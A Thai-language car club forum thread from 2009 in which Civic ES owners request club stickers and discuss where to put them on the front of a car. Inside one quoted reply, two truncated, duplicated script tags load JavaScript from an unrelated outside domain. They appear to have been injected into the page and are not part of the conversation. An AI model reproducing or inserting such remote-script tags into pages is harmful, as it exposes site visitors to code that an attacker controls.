ตอบ
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 25 มิถุนา 2009 17:51 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
ถ้าจะติดผมแนะนำติดหน้าซ้ายนะครับ

ผมเคยติดหน้าขวาแล้วตอนจะเลี้ยวลำบากโครตๆ

เลยย้ายนมาซ้ายหมดเลย
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
พฤหัส, 25 มิถุนา 2009 19:02 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
l3estZ พิมพ์ว่า:
cisco พิมพ์ว่า:
naponghp พิมพ์ว่า:
pee พิมพ์ว่า:
pupaekung พิมพ์ว่า:
มันมีติกเกอร์ ที่เป็นติกเกอร์จอดรถอ่ะครับ พี่ในคลับท่านหนึ่งใจดีทำมาแจกให้อ่ะ(ขออภัยครับจำชื่อไม่ได้) มีหลายแบบหลายลายให้เลือก แต่มองดูแล้วก้เป็น CIVIC ES GROUP อ่ะครับ แปะตามมุม ผมเห็นบางคันแปะ 3 แบบเลยเรียงกัน สวยดีครับ มิตติ้งหน้าลองดูครับ

ผมก็ติดอยู่ครับ ที่หน้ากระจก เป็นของพี่หนึ่ง ahingrace ครับลอง PM ถามดูได้พี่เค้าใจดี

*** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***

หรือมาเอาที่ผมก็ได้

ยังเหลืออยู่ 5 แผ่นอ่ะ มีทั้ง สูญญากาศ และ สติ๊กเกอร์ :P
อยากได้แบบที่เป็นสติ๊กเกอร์อ่ะคับ

มีครบทั้ง 3 แบบ ถ้าเป็นสติ๊กเกอร์นะ :P

อยากได้บ้างทำไงครับ

PM ไปขอพี่ ahingrace ครับ ถ้าพี่เค้ายังเหลืออยู่ก็คุยกับพี่เค้าเลย

ส่วนของผมมารับได้ที่ผมเลยครับ ขอเป็นวันศุกร์ล่ะกัน มีแค่ 5 ใบนะ สะดวกที่ศูนย์ประชุมสิริกิตย์

สติ๊กเกอร์ 3 แบบ ครบ กับ สูญญากาศไม่มีแบบ ES Group ตัวใหญ่ ๆ แบบแรก อ่ะ

อยากได้แบบแรกอ่ะครับ พี่เต้น แบบ เป็นสูญญากาศ ยังมีอยู่มะครับ ฝากโจ้มาให้ที
ว่าแต่ ฟรีป่าว อิอิ

พี่เอาติดไปแล้ว อ่ะ ไม่รู้ว่าหมดยัง เดียวไปดูที่รถให้

แต่สติ๊กเกอร์มีชัว
l3estZ

เข้าร่วม: 01 ตุลา 2008
ตอบ: 385

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 430
ให้คำขอบคุณ: 78

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 25 มิถุนา 2009 19:08 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
l3estZ พิมพ์ว่า:
naponghp พิมพ์ว่า:
pee พิมพ์ว่า:
มันมีติกเกอร์ ที่เป็นติกเกอร์จอดรถอ่ะครับ พี่ในคลับท่านหนึ่งใจดีทำมาแจกให้อ่ะ(ขออภัยครับจำชื่อไม่ได้) มีหลายแบบหลายลายให้เลือก แต่มองดูแล้วก้เป็น CIVIC ES GROUP อ่ะครับ แปะตามมุม ผมเห็นบางคันแปะ 3 แบบเลยเรียงกัน สวยดีครับ มิตติ้งหน้าลองดูครับ

ผมก็ติดอยู่ครับ ที่หน้ากระจก เป็นของพี่หนึ่ง ahingrace ครับลอง PM ถามดูได้พี่เค้าใจดี

*** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***

ยังเหลืออยู่ 5 แผ่นอ่ะ มีทั้ง สูญญากาศ และ สติ๊กเกอร์ :P
อยากได้แบบที่เป็นสติ๊กเกอร์อ่ะคับ

มีครบทั้ง 3 แบบ ถ้าเป็นสติ๊กเกอร์นะ :P

อยากได้บ้างทำไงครับ

PM ไปขอพี่ ahingrace ครับ ถ้าพี่เค้ายังเหลืออยู่ก็คุยกับพี่เค้าเลย

ส่วนของผมมารับได้ที่ผมเลยครับ ขอเป็นวันศุกร์ล่ะกัน มีแค่ 5 ใบนะ สะดวกที่ศูนย์ประชุมสิริกิตย์

สติ๊กเกอร์ 3 แบบ ครบ กับ สูญญากาศไม่มีแบบ ES Group ตัวใหญ่ ๆ แบบแรก อ่ะ

อยากได้แบบแรกอ่ะครับ พี่เต้น แบบ เป็นสูญญากาศ ยังมีอยู่มะครับ ฝากโจ้มาให้ที
ว่าแต่ ฟรีป่าว อิอิ

พี่เอาติดไปแล้ว อ่ะ ไม่รู้ว่าหมดยัง เดียวไปดูที่รถให้

แต่สติ๊กเกอร์มีชัว

ครับผม อันไหนก็ได้ครับ
ขอบคุณมากครับ
เมื่อไรจะได้ไปเดิน คลองถมกันอีก อิอิ
marijuanna

เข้าร่วม: 19 เมษา 2009
ตอบ: 241

ได้รับคำขอบคุณ: 210
ให้คำขอบคุณ: 5
พฤหัส, 25 มิถุนา 2009 22:44 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
พี่หนึ่ง น้องขอด้วยนะครับพี่ ได้เมื่อไหร่ Pm บอกหน่อยนะครับ

ขอบคุณมากๆครับพี่
por

เข้าร่วม: 01 เมษา 2009
ตอบ: 760

Guru ES
Guru ES

ได้รับคำขอบคุณ: 977
ให้คำขอบคุณ: 913

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 25 มิถุนา 2009 23:27 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
jonatan พิมพ์ว่า:
ผมว่าติ๊กเกอร์คลับเรา เท่ห์ดีน่ะ
ทั้งติ๊กเกอร์ป้ายจอด และติ๊กเกอร์คลับด้านหลังอ่ะ
สวยและเท่ห์ ก่าคลับ อื่นๆๆ อีกอ่ะ อันนี้ผมพูดจริงๆๆน่ะ คนออกแบบเจ๋ง ดีคับผม
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

จริงครับ เท่มาก เรียบๆ แต่เท่โคตร
note^-^

ชื่อเล่น: โน๊ต

เข้าร่วม: 23 ตุลา 2008
ตอบ: 1188

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1988
ให้คำขอบคุณ: 501

ปี: 2003
พฤหัส, 25 มิถุนา 2009 23:40 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
และแล้วก็สรุปสติ๊กเกอร์ติดหน้ารถได้แล้ว เย้ๆๆ คราวนี้เจอจะได้รู้
note^-^

ชื่อเล่น: โน๊ต

เข้าร่วม: 23 ตุลา 2008
ตอบ: 1188

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1988
ให้คำขอบคุณ: 501

พฤหัส, 25 มิถุนา 2009 23:45 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
ahingrace พิมพ์ว่า:
ขอบคุณครับ..เรื่องสติกเกอร์ ที่ติดด้านหน้ากำลังจัดทำเพิ่มอยู่ครับ
เดือนหน้ามารับได้เลยครับที่ผม..ทั้ง 3 แบบ

เจ๋งไปเลยพี่ ขอบคุณมากๆนะคับ ผมก็ขอมาจากพี่ทั้ง3แบบเลยครบๆๆ อิอิอิ
ใจๆอย่างนี้ THANK เลยคับพี่
tur

ชื่อเล่น: เต๋อ

เข้าร่วม: 11 พฤษภาคม 2009
ตอบ: 1038

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2473
ให้คำขอบคุณ: 1234

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 25 มิถุนา 2009 23:57 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
อยากได้ด้วยครับ ยังไง PM แจ้งผมด้วยนะครับ จะปฏิบัติตามเลยย
ES2.0

ชื่อเล่น: ปาล์ม

เข้าร่วม: 17 เมษา 2009
ตอบ: 1013

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1027
ให้คำขอบคุณ: 1000

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
จันทร์, 29 มิถุนา 2009 19:21 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
อ้างอิงจาก:

ยังเหลืออยู่ 5 แผ่นอ่ะ มีทั้ง สูญญากาศ และ สติ๊กเกอร์

อยากได้มั่งอ่ะมีอีกป่าว ชอบๆๆ
ter_ter

เข้าร่วม: 18 พฤษภาคม 2009
ตอบ: 125

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 70

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 29 มิถุนา 2009 19:27 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
มีรูปตอนติดรึป่าวคับ ติดตรงไหนกันบ้างคับ
jonatan

ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 30 มิถุนา 2009 08:59 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
ขอบ้างได้มัยอ่ะคับ
ป้ายจอดเนี้ย สวยดี เท่ห์ดี
แบบไหนก็ได้ ต้องทำยังงัยบ้างอ่ะคับ
ถึงจะได้มาติดอ่ะ หรือว่าต้องไปมิตติ้งอย่างเดียวอ่ะ งัย PM บอกผมบ้างน่ะคับ
future

เข้าร่วม: 24 เมษา 2009
ตอบ: 893

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1055
ให้คำขอบคุณ: 736

ที่อยู่: ลาดพร้าว 101/ ท่าเรือคลองเตย / สนามบินสุวรรณภูมิ /นครศรีธรรมราช
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 30 มิถุนา 2009 12:11 - *** ESgroup เราไม่มีสติกเกอร์ ติดด้านหน้ารถบ้างหรอคับ ***
ผมว่าติ๊กเกอร์คลับเรา เท่ห์ดีน่ะ
ทั้งติ๊กเกอร์ป้ายจอด และติ๊กเกอร์คลับด้านหลังอ่ะ
สวยและเท่ห์ ก่าคลับ อื่นๆๆ อีกอ่ะ อันนี้ผมพูดจริงๆๆน่ะ คนออกแบบเจ๋ง ดีคับผม

ขอหนับหนุนความคิดนี้อีกเสียง ดูดีมีสกุลไม่เลอะเทอะครับ
ได้รับคำขอบคุณจาก: hacker 
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.